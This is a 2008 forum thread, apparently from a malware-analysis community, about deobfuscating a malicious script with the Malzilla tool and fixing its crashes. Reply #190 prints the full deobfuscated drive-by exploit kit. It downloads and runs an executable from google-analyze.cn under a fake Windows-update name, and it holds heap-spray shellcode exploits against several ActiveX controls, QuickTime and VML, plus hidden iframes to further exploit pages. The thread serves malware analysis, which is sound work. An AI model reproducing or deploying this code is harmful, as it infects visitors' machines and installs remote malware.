Same here :( (confirmed on XP SP2 and SP3)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 02, 2008, 04:04:47 am
Reply #189

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Which option you use for eval() (replace, override, leave as is)?
It works fine for me here with "leave as is".
Do you have enough free space on partition, as this script require a lot of free space (>100mb)?
Is the "eval_temp" folder present in Malzilla's folder?

September 02, 2008, 04:05:56 am
Reply #190

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Here is the script after deobfuscation:
Code: [Select]
var url='http://google-analyze.cn/getexe.exe?o=2&t=1220309190&i=1365934880&e=';
var success=0;
var exeurl=url+'1';
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
var repl=new Array("-","ip","il","te","je","el","ca","ec","ol","os","LH","SX","ve","DO","re","od","pe","it","cl");
function Go(a){
var fso=a.CreateObject("Scr"+repl[1]+"ting.F"+repl[2]+"eSys"+repl[3]+"mOb"+repl[4]+"ct","")
var sap=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");
var nl=null;
fname="KB908845.exe";
fname=eval("fso.Bu"+repl[2]+"dPath(fso.GetSp"+repl[7]+"ialF"+repl[8]+"der(2),fname)");
try{nl=CreateO(a,"Micr"+repl[9]+"oft.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.Ser"+repl[12]+"rXM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",exeurl,false);}
catch(e){return 0;}}}}
nl.send(null);
rb=nl.responseBody;
var x=CreateO(a,"A"+repl[13]+"DB.St"+repl[14]+"am");
x.Type=1;
eval("x.M"+repl[15]+"e=3;x.O"+repl[16]+"n();x.Wr"+repl[17]+"e(rb);x.Sa"+repl[12]+"Tof"+repl[2]+"e(fname,2);sap.Sh"+repl[5]+"lEx"+repl[7]+"ute(fname);");
return 1;
}
function mdac(){
var i=0;
var target=new Array("BD96C556"+repl[0]+"65A3-11D0-983A-00C04FC29E36","AB9BCEDD"+repl[0]+"EC7E-47E1-9322-D4A210617116","0006F033"+repl[0]+"0000-0000-C000-000000000046","0006F03A"+repl[0]+"0000-0000-C000-000000000046","6e32070a"+repl[0]+"766d-4ee6-879c-dc1fa91d2fc3","6414512B"+repl[0]+"B978-451D-A0D8-FCFDF33E833C","7F5B7F63"+repl[0]+"F06F-4331-8A26-339E03C0AE3D","06723E09"+repl[0]+"F4C2-43c8-8358-09FCD1DB0766","639F725F"+repl[0]+"1B2D-4831-A9FD-874847682010","BA018599"+repl[0]+"1DB3-44f9-83B4-461454C84BF8","D0C07D56"+repl[0]+"7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF"+repl[0]+"CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute(repl[18]+"assid",repl[18]+"sid:"+target[i]);
if(a){try{var b=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");if(b){if(Go(a))return 1;}}catch(e){}}
i++;
}
}
if(mdac()) success=1;
if(!success){
document.write("<script language=VBScript>\r\n"+
'Set elem=document.createElement("ob'+repl[4]+'ct")'+"\r\n"+
'fname="KB908518.exe"'+"\r\n"+
'elem.setAttribute "id","elem"'+"\r\n"+
'elem.setAttribute "'+repl[18]+'assid","'+repl[18]+'sid:BD96C556'+repl[0]+'65A3-11D0-983A-00C04FC29E36"'+"\r\n"+
'Set obj=elem.CreateObject("Sh'+repl[5]+'l.Appli'+repl[6]+'tion","")'+"\r\n"+
"Set nsp=obj.NameSpace(20)\r\n"+
'Set pnm=nsp.ParseName("Symbol.ttf")'+"\r\n"+
'tmp=Split(pnm.Path,"\\",-1,1)'+"\r\n"+
'path=tmp(0) & "\\" &  tmp(1) & "\\"'+"\r\n"+
"fname=path & fname\r\n"+
'set tpqpd=CreateObject("Micr'+repl[9]+'oft.XM'+repl[10]+'TTP")'+"\r\n"+
'iiqu=tpqpd.Open("GET",exeurl,0)'+"\r\n"+
"tpqpd.Send()\r\n"+
"On Error Resume Next\r\n"+
"egsyho=tpqpd.responseBody\r\n"+
'Set acvqqrp=elem.CreateObject("Scr'+repl[1]+'ting.F'+repl[2]+'eSys'+repl[3]+'mOb'+repl[4]+'ct","")'+"\r\n"+
"Set kld=acvqqrp.CreateTextFile(fname, TRUE)\r\n"+
"lotzom=LenB(egsyho)\r\n"+
"For j=1 To lotzom\r\n"+
"plkosl=MidB(egsyho,j,1)\r\n"+
"qamplxd=AscB(plkosl)\r\n"+
"kld.Write(Chr(qamplxd))\r\n"+
"Next\r\n"+
"kld.Close\r\n"+
'Set yipt=elem.CreateObject("WScr'+repl[1]+'t.Sh'+repl[5]+'l","")'+"\r\n"+
"On Error Resume Next\r\n"+
"yipt.R"+repl[19]+" fname,1,FALSE\r\n"+
'<\/script>');
}

if(!success){
exeurl=url+'9';
document.write('<object classid="clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5" id="test"></object>');
try{test.DownloadFile(exeurl,"..\\~tmp0001.exe","0","0");document.location="exploits/x9.php?zenturi=1";}catch(e){}
}

var nop='90',noc='0C',scf='F';var shellco='%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320'+
'%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE'+'%u3828%u74F2'+
'%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF'+'%u5EE7%u5E8B'+
'%u0324%u66DD%u0C8B%u8B4B'+'%u1C5E%uDD03%u048B%u038B'+
'%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u2e00%u5C2e'+
'%u2e7e%u7865%u0065%uC033%u0364%u3040%u0C78%u408B'+
'%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40'+
'%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83'+
'%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F'+'%u6FE8'+
'%uFFF'+scf+'%u8BFF%u2454%u8DFC%uBA52%uDB33'+'%u5353%uEB52'+
'%u5324%uD0FF%uBF5D%uFE98%u0E8A'+'%u53E8%uFFF'+scf+'%u83FF'+
'%u04EC%u2C83%u6224%uD0FF%u7EBF'+'%uE2D8%uE873%uFF40'+
'%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6E61%u6C61%u7A79%u2E65%u6E63%u672F%u7465%u7865%u2E65%u7865%u3F65%u3D6F%u2632%u3D74%u3231%u3032%u3033%u3139%u3039%u6926%u313D%u3633%u3935%u3433%u3838%u2630%u3D65';


if(!success){

var obj=null;

try{

obj=document.createElement("object");

obj.setAttribute("classid","clsid:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F");

if(obj){

var mystring=unescape(shellco+"%u3731");

var hbs=0x100000,sss=hbs-(mystring.length*2+0x38);

var hb=(0x0c0c0c0c-hbs)/hbs;

var myvar=unescape("%u"+noc+noc+"%u"+noc+noc);

var ss=myvar;

while(ss.length*2<sss)ss+=ss;

ss=ss.substring(0,sss/2);

var m=new Array();

for(i=0;i<hb;i++)m[i]=ss+mystring;

z=Math.ceil(0x0c0c0c0c);

z=document.scripts[0].createControlRange().length;

}

}catch(e){}

}



if(!success){
obj=document.write('<iframe src="exploits/x12b.php?o=2&t=1220309190&i=1365934880" width=0 height=0></iframe>');
}



if(!success){

var repl=new Array("cl","-");

try{

obj=document.createElement("object");

obj.setAttribute(repl[0]+"assid",repl[0]+"sid:2F542A2E"+repl[1]+"EDC9-4BF7-8CB1-87C9919F7F93");

var mystring=unescape(shellco+'%u3331');

var myvar = unescape("%u"+noc+noc+"%u"+noc+noc);

var bblock = myvar;

var sspace = 20 + mystring.length;

while (bblock.length < sspace) bblock += bblock;

var fblock = bblock.substring(0,sspace);

var block = bblock.substring(0,bblock.length - sspace);

while (block.length + sspace < 0x40000) block = block + block + fblock;

var mem = new Array();

for (i=0; i<400; i++) mem[i]=block+mystring;

var buf = '';

while (buf.length < 32) buf = buf + unescape("%"+noc);

var m = '';

m = obj.Console;

obj.Console = buf;

obj.Console = m;

m = obj.Console;

obj.Console = buf;

obj.Console = m;

}catch(e){}

}



if(!success){
var target1=document.createElement("object");
target1.setAttribute("classid","clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277");
var target2=document.createElement("object");
target2.setAttribute("classid","clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277");
var mystring=unescape(shellco+'%u3031');
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var bigblock=myvar;
var slspace=20+mystring.length;
while(bigblock.length<slspace)bigblock+=bigblock;
var fillblock=bigblock.substring(0,slspace);
var block=bigblock.substring(0,bigblock.length-slspace);
while(block.length+slspace<0x40000)block=block+block+fillblock;
var memory=new Array();
for(x=0;x<800;x++)memory[x]=block+mystring;
buffer="\x0a";
add = buffer+buffer+buffer+buffer;
while(buffer.length<5000)buffer+=add;
try{target1.server=buffer;target1.initialize();target1.send()}catch(e){}
try{target2.server=buffer;target2.receive();}catch(e){}
}

if(!success){

var repl=new Array("cl","-");

try{

winzip=document.createElement("object");

winzip.setAttribute(repl[0]+"assid",repl[0]+"sid:A09AE68F"+repl[1]+"B14D-43ED-B713-BA413F034904");

var mystring=unescape(shellco+'%u2038');

var hstoaddr=0x0c0c0c0c;

var hbsize=0x400000;

var spslsize=hbsize-(mystring.length*2+0x38);

var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);

var bigb=myvar;

while(bigb.length*2<spslsize)bigb+=bigb;

bigb=bigb.substring(0,spslsize/2);

hblocks=(hstoaddr-0x400000)/hbsize;

var memory=new Array();

for(var i=0;i<hblocks;i++)memory[i]=bigb+mystring;

var test='';

for(i=1;i<231;i++)test+='A';

test+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";

try{winzip.CreateNewFolderFromName(test)}catch(e){}

}catch(e){}

}



if(!success){
var repl=new Array("ti","bj");
try{
var test=eval("new Ac"+repl[0]+"veXO"+repl[1]+"ect('QuickTime.QuickTime')");
var mystring=unescape(shellco+'%u2037');
var hstoaddr=0x0c0c0c0c;
var hbsize=0x400000;
var spslsize=hbsize-(mystring.length*2+0x38);
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var bigb=myvar;
while(bigb.length*2<spslsize)bigb+=bigb;
hblocks=(hstoaddr-0x400000)/hbsize;
bigb=bigb.substring(0,spslsize/2);
var memory=new Array();
for(var i=0;i<hblocks;i++)memory[i]=bigb+mystring;
document.write('<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"><param name="src" value="exploits/x7b.php"><param name="autoplay" value="true"><param name="loop" value="false"><param name="controller" value="true"></object>');}
catch(e){}
}

if(!success){
try{
var obj=document.createElement("object");
obj.setAttribute("classid","clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E");
var hstoaddr=0x05050505;
var mystring=unescape(shellco+'%u2033');
var hbsize=0x400000;
var plsize=mystring.length*2;
var spslsize=hbsize-(plsize+0x38);
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var spsl=myvar;
while(spsl.length*2<spslsize)spsl+=spsl;
var spsl=spsl.substring(0,spslsize/2);
hblocks=(hstoaddr-0x400000)/hbsize;
var memory=new Array();
for(i=0;i<hblocks;i++)memory[i]=spsl+mystring;
var ssrt=' method="';
for(i=0;i<10437;i++)ssrt+='&#x0505;';
document.write('<html xmlns:v="urn:schemas-microsoft-com:vml"><object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"></object><style>v\\:*{behavior:url(#VMLRender);}</style><v:rect style="width:120pt;height:80pt" fillcolor="red"><v:fill'+ssrt+'"></v:rect></v:fill>');
}catch(e){}
}

if(!success){
var repl=new Array("eb","ie","ol","co","et","li");
try{
var wvfi="W"+repl[0]+"V"+repl[1]+"wF"+repl[2]+"derI"+repl[3]+"n.W"+repl[0]+"V"+repl[1]+"wF"+repl[2]+"derI"+repl[3]+"n.1";
var wvfio=new ActiveXObject(wvfi);
var mystring='%u'+nop+nop+shellco+'%u2032';
while(mystring.length<3072)mystring+="%u"+noc+noc;
mystring=unescape(mystring);
var myvar=unescape("%u"+noc+noc);
var bigb=myvar;
while(bigb.length<=0x100000)bigb+=bigb;
var memory=new Array();
for(var i=0;i<120;i++)memory[i]=bigb.substring(0,0x100000-mystring.length)+mystring;
for(var i=0;i<1024;i++){
var wvfio=new ActiveXObject(wvfi);
eval("try{wvfio.s"+repl[4]+"S"+repl[5]+"ce(0x7ffffffe,0,0,202116108);}catch(e){}");
var wvfio=new ActiveXObject(wvfi);
}
}catch(e){}
}

September 02, 2008, 05:01:30 am
Reply #191

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I've got it set to Override :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 02, 2008, 03:21:00 pm
Reply #192

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Please use "Leave as is" as long as it give results. Use the other two options just in case the "Leave as is" does not work.

September 02, 2008, 06:07:01 pm
Reply #193

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
bobby what are your pc specs and how long did it need to run for? This takes a while... and if you go to other windows and then back to malzilla's window it gives the access violation.

September 02, 2008, 06:51:49 pm
Reply #194

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
I use 2GHz AMD Athlon XP with 1GB RAM. Pretty old configuration for today's standards.
In your example, it creates some 22.000 temp files in eval_temp folder (every time eval() is called, a file is created, and it contains the arguments of eval() function). After that, Malzilla will eliminate duplicates between temp files, so it will remain less than 10 files after that (usually 3-5 files).
Most of the temp files are just a couple of bytes long (<100 bytes), but every file will occupy one whole cluster (usually 4kb), so you need 80mb free space on partition for the temp files.
To deobfuscate this script, my PC needs some 2-3 minutes (no anti-virus app is running, or some other heavy-duty service). Partition is NTFS, not compressed, file indexing is turned off.

I will try to reproduce the bug you got.

btw. are you running more than one instance of Malzilla at once? Both working on deobfuscation at the same time?